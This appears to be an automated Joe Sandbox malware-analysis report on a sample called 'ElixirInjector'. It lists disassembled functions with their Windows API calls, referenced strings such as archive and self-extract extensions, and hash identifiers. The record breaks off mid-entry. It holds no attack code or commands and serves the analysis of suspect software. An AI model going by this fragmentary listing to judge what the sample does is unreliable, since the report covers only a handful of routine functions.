Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: c3468415ae7692b31f6bb1fde9b3a83dcb1d9a7c32b1ac7890b00256ee3803eb
Instruction ID: 719569e036eacc394240b1d61dbfde301db3dadae50b630c4926518e564d6faa
Opcode Fuzzy Hash: c3468415ae7692b31f6bb1fde9b3a83dcb1d9a7c32b1ac7890b00256ee3803eb
Instruction Fuzzy Hash: 5DF03C72E0122DBBCB206BA5EC4DDDB7F6DEF527A5B004121B50AE2050D6748686E7A1

Function 00F1C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00F205DA: _wcslen.LIBCMT ref: 00F205E0

Part of subcall function 00F1B92D: _wcsrchr.LIBVCRUNTIME ref: 00F1B944

_wcslen.LIBCMT ref: 00F1C197
_wcslen.LIBCMT ref: 00F1C1DF

Strings

.exe, xrefs: 00F1C10B
.rar, xrefs: 00F1C0E1, 00F1C134
.sfx, xrefs: 00F1C11A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 33e2fa2c040e6520af037a75523f57d76d4b11225ae71264ba02bc46d412ed79
Instruction ID: b5062436a3bcd8e9c18492d32788954d7f904b12374b1bb1a3c35073536ff5c1
Opcode Fuzzy Hash: 33e2fa2c040e6520af037a75523f57d76d4b11225ae71264ba02bc46d412ed79
Instruction Fuzzy Hash: 8E4148229C0361A6C735AF349C12ABA73B4EF44764F10490EF9D1AB082EB648DC1F3D6

Function 00F2CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00F2CE9D

Part of subcall function 00F1B690: _wcslen.LIBCMT ref: 00F1B696

_swprintf.LIBCMT ref: 00F2CED1

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

SetDlgItemTextW.USER32(?,00000066,00F5946A), ref: 00F2CEF1
EndDialog.USER32(?,00000001), ref: 00F2CFFE

Strings

%s%s%u, xrefs: 00F2CEC6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 66f1436f995d3cf9683a0124bb651180fe286587b5a1f8c135d18dd7b20362b3
Instruction ID: 6a572df7cf1034ef57c1b89bbd26b00d20eaf4a6859627267f0164e543bdc4fd
Opcode Fuzzy Hash: 66f1436f995d3cf9683a0124bb651180fe286587b5a1f8c135d18dd7b20362b3
Instruction Fuzzy Hash: BF419671800268AADF25DB90DC45FEE77BCEB04351F408096FA09E7051EE749E44EFA2

Function 00F1BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F1BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00F1A275,?,?,00000800,?,00F1A23A,?,00F1755C), ref: 00F1BBC5
_wcslen.LIBCMT ref: 00F1BC3B

Strings

\\?\, xrefs: 00F1BB52, 00F1BB99, 00F1BBF7, 00F1BC4E
UNC, xrefs: 00F1BBA7

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 0b49bf0ed156335e0dd96cc30ac72cd405b2d221ac239bc23313090014846f7f
Instruction ID: 08dd340d8030a3b5850e3166adb1aede1b620dab9a1432a747688ba2b7f55109
Opcode Fuzzy Hash: 0b49bf0ed156335e0dd96cc30ac72cd405b2d221ac239bc23313090014846f7f
Instruction Fuzzy Hash: 4C419332840216F6DF21AF61DC42EEA77A9AF453A0F144469F854A3151DF74DAD0FAA0

Function 00F2B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00F2B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00F2B712
DeleteObject.GDI32(00000000), ref: 00F2B744
DeleteObject.GDI32(00000000), ref: 00F2B767

Part of subcall function 00F2A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F2B73D,00000066), ref: 00F2A6D5
Part of subcall function 00F2A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A6EC
Part of subcall function 00F2A6C2: LoadResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A703
Part of subcall function 00F2A6C2: LockResource.KERNEL32(00000000,?,?,?,00F2B73D,00000066), ref: 00F2A712
Part of subcall function 00F2A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F2B73D,00000066), ref: 00F2A72D
Part of subcall function 00F2A6C2: GlobalLock.KERNEL32(00000000), ref: 00F2A73E
Part of subcall function 00F2A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F2A762
Part of subcall function 00F2A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F2A7A7
Part of subcall function 00F2A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00F2A7C6
Part of subcall function 00F2A6C2: GlobalFree.KERNEL32(00000000), ref: 00F2A7CD

Strings

], xrefs: 00F2B71A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 08cc66fcc5561c9b9cb3b5fb0cf806059ea519aec0ebf7344d235b694855ac03
Instruction ID: 3d018f0794ec97a1c981021a6d9e453f9c722d14a120cf7acce8983546b1d112
Opcode Fuzzy Hash: 08cc66fcc5561c9b9cb3b5fb0cf806059ea519aec0ebf7344d235b694855ac03
Instruction Fuzzy Hash: 9E01C03690022567C7127774AC0AEAF7BBAAFC0B66F180010FD00A7291DF258D0972B2

Function 00F2D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00F11316: GetDlgItem.USER32(00000000,00003021), ref: 00F1135A
Part of subcall function 00F11316: SetWindowTextW.USER32(00000000,00F435F4), ref: 00F11370

EndDialog.USER32(?,00000001), ref: 00F2D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F2D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00F2D675
SetDlgItemTextW.USER32(?,00000068), ref: 00F2D684

Strings

RENAMEDLG, xrefs: 00F2D618

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: dc34cff358aebd583ed480b48d3c6171c969d2f79d324a3e29e0043a39207ef0
Instruction ID: e7c9cd060a2d2008afc99997364cd00b4719830b6b3f08ec567c7fa93adf2d8e
Opcode Fuzzy Hash: dc34cff358aebd583ed480b48d3c6171c969d2f79d324a3e29e0043a39207ef0
Instruction Fuzzy Hash: C601D833644238BBD2215F64BD09F577F5DFB5AB11F110411F745A20D0C6E29A08BB76

Function 00F37E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00F37E24,?,?,00F37DC4,?,00F4C300,0000000C,00F37F1B,?,00000002), ref: 00F37E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F37EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00F37E24,?,?,00F37DC4,?,00F4C300,0000000C,00F37F1B,?,00000002,00000000), ref: 00F37EC9

Strings

CorExitProcess, xrefs: 00F37E9E
mscoree.dll, xrefs: 00F37E8C

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1b0b2382dba576af53e537bc934067710d397d2ae40cc02f6edb21c3ba6a3b0
Instruction ID: a8de3bd12e0bc865452fcf98122ae98412904065d678e08fa431d1741052ada2
Opcode Fuzzy Hash: f1b0b2382dba576af53e537bc934067710d397d2ae40cc02f6edb21c3ba6a3b0
Instruction Fuzzy Hash: 68F04F75A0421DBBCB11ABA4DC09B9EBFB4EF45725F0041A9FC05E2260DB709E84EA91

Function 00F1F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F20836
Part of subcall function 00F2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F1F2D8,Crypt32.dll,00000000,00F1F35C,?,?,00F1F33E,?,?,?), ref: 00F20858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F1F2E4
GetProcAddress.KERNEL32(00F581C8,CryptUnprotectMemory), ref: 00F1F2F4

Strings

CryptProtectMemory, xrefs: 00F1F2DE
Crypt32.dll, xrefs: 00F1F2CE
CryptUnprotectMemory, xrefs: 00F1F2EA

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 1d586d344b51991983afd570aa3ed5385dc1ba421ab9b5f6ea9405ced8e466a6
Instruction ID: 21258090d118ab345c359ed2891d6e7f5759c0ef4aa1f33cf5126c88a2febd3a
Opcode Fuzzy Hash: 1d586d344b51991983afd570aa3ed5385dc1ba421ab9b5f6ea9405ced8e466a6
Instruction Fuzzy Hash: 11E02638C407019EC7209F38980CB42BED46F14714F10881DF8DAD3640CBB8D080AB01

Function 00F32BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F32CA1
___AdjustPointer.LIBCMT ref: 00F32CC4
_abort.LIBCMT ref: 00F32D12
___AdjustPointer.LIBCMT ref: 00F32D60

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 9f67389d4d90b1fe11c14a01105983391683e07a2c47657174c23272d2a9a24c
Instruction ID: 8415f1ac34272177ced655ea188cec3171ceaee6624976b66babf7c15bdf71d1
Opcode Fuzzy Hash: 9f67389d4d90b1fe11c14a01105983391683e07a2c47657174c23272d2a9a24c
Instruction Fuzzy Hash: B951E472A00212AFDB698F14D845BAEB7A4FF54730F24452EEC05576A1D735ED80F790

Function 00F3BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F3BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F3BF5C

Part of subcall function 00F38E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F34286,?,0000015D,?,?,?,?,00F35762,000000FF,00000000,?,?), ref: 00F38E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F3BF82
_free.LIBCMT ref: 00F3BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F3BFA4

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 594158e0230fce0e160d6bba70747e4816e572af1c95bcc2ce7e4f5c81464ce7
Instruction ID: 2906383af6ef42800606d5b711ae7d49859e0df6a244174c78cb99cfc3bd521c
Opcode Fuzzy Hash: 594158e0230fce0e160d6bba70747e4816e572af1c95bcc2ce7e4f5c81464ce7
Instruction Fuzzy Hash: FA01B1A6A01616BF272116BA5C58C7B7A6DDEC7BB17140129FE04C2104EF64CD02B5B0

Function 00F39869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00F391AD,00F3B188,?,00F39813,00000001,00000364,?,00F340EF,?,?,00F51098), ref: 00F3986E
_free.LIBCMT ref: 00F398A3
_free.LIBCMT ref: 00F398CA
SetLastError.KERNEL32(00000000,?,00F51098), ref: 00F398D7
SetLastError.KERNEL32(00000000,?,00F51098), ref: 00F398E0

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 59610031e1e90ea9a8f8ad69255b6958c12c4b7c487cd0d551917598858f46bf
Instruction ID: 145a3f262844075dd104549425120320a29f2884e4f7034ae2d9af5c19cb9e4b
Opcode Fuzzy Hash: 59610031e1e90ea9a8f8ad69255b6958c12c4b7c487cd0d551917598858f46bf
Instruction Fuzzy Hash: EC01D13A54D6056B83122729AC95A1A35399FE3774F600135F91592292EEE8CC067261

Function 00F20EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00F211CF: ResetEvent.KERNEL32(?), ref: 00F211E1
Part of subcall function 00F211CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00F211F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00F20F21
CloseHandle.KERNEL32(?,?), ref: 00F20F3B
DeleteCriticalSection.KERNEL32(?), ref: 00F20F54
CloseHandle.KERNEL32(?), ref: 00F20F60
CloseHandle.KERNEL32(?), ref: 00F20F6C

Part of subcall function 00F20FE4: WaitForSingleObject.KERNEL32(?,000000FF,00F21101,?,?,00F2117F,?,?,?,?,?,00F21169), ref: 00F20FEA
Part of subcall function 00F20FE4: GetLastError.KERNEL32(?,?,00F2117F,?,?,?,?,?,00F21169), ref: 00F20FF6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: ea93e55d7c8230b8e20faa9a15d94a4d1ef96c688380a196c13739501b288396
Instruction ID: a02f27c28393a07d0398bab81f21ec5bd222c3ee7a7203886965107f2520ab00
Opcode Fuzzy Hash: ea93e55d7c8230b8e20faa9a15d94a4d1ef96c688380a196c13739501b288396
Instruction Fuzzy Hash: 0E01B176000744EFC7329B68ED84BC6FBA9FB08714F000A29F66B92160CB767A44EB54

Function 00F3C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F3C817

Part of subcall function 00F38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?), ref: 00F38DE2
Part of subcall function 00F38DCC: GetLastError.KERNEL32(?,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?,?), ref: 00F38DF4

_free.LIBCMT ref: 00F3C829
_free.LIBCMT ref: 00F3C83B
_free.LIBCMT ref: 00F3C84D
_free.LIBCMT ref: 00F3C85F

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cdfe52d1106049423645a6416714b63d089959be9e0ef6c38d62bdcda2d162c5
Instruction ID: 08db486db3f76ff82799b8923ff36145e942fffb1c46cb59f2f101d7c396a2f9
Opcode Fuzzy Hash: cdfe52d1106049423645a6416714b63d089959be9e0ef6c38d62bdcda2d162c5
Instruction Fuzzy Hash: C9F06232900205AB8720EB68F885C0673F9BA10B74F550819F548E7552CB78FD81EB90

Function 00F21FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F21FE5
_wcslen.LIBCMT ref: 00F21FF6
_wcslen.LIBCMT ref: 00F22006
_wcslen.LIBCMT ref: 00F22014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00F1B371,?,?,00000000,?,?,?), ref: 00F2202F

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 88f0ebd36598de72e70491be5c926922dd0aa6419a31aed3d5c7c0e8921ff303
Instruction ID: debb317db100a075a143087985e4d3e330a3408a210046c77829ddcd5c94a1d4
Opcode Fuzzy Hash: 88f0ebd36598de72e70491be5c926922dd0aa6419a31aed3d5c7c0e8921ff303
Instruction Fuzzy Hash: 11F01D33408024BBCF22AF51EC09D8A7F26EB45770F118415FA1A5A061CB7296A5E690

Function 00F38900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F3891E

Part of subcall function 00F38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?), ref: 00F38DE2
Part of subcall function 00F38DCC: GetLastError.KERNEL32(?,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?,?), ref: 00F38DF4

_free.LIBCMT ref: 00F38930
_free.LIBCMT ref: 00F38943
_free.LIBCMT ref: 00F38954
_free.LIBCMT ref: 00F38965

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e15ec0c61966d43b4bbb4df2ea5f7ce6613ac88c7fe7cba002387ac9a8ac48b
Instruction ID: 99d8a2717d3e6c418518a7d1f65792593f114dff641c0453611f8c1164f1be6f
Opcode Fuzzy Hash: 3e15ec0c61966d43b4bbb4df2ea5f7ce6613ac88c7fe7cba002387ac9a8ac48b
